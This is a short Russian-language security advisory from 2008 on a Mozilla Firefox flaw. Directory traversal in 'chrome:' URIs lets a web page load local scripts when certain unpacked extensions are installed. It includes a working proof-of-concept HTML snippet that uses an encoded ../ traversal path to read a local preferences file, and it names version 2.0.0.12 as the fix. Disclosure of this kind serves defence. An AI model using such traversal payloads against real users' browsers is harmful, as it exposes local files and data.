Обход ограничений безопасности в Mozilla Firefox

Описание:
Уязвимость позволяет удаленному пользователю получить доступ к важным данным.

Уязвимость существует из-за ошибки при обработке "chrome:" URI. Злоумышленник может подключить произвольные сценарии на локальной системе с помощью символов обхода каталога. Для успешной эксплуатации уязвимости требуется, чтобы на системе было установлено расширение, не сохраняющее содержимое сценариев в .jar файлах (например, DownLoad Statusbar). Пример:

<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script>
<script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files%2fMozilla
%20Thunderbird%2fgreprefs%2fall.js'></script>

URL производителя: www.mozilla.com/en-US/firefox/

Решение: Установите последнюю версию 2.0.0.12 с сайта производителя.

Журнал изменений:

08.02.2008
Обновлена секция «Решение».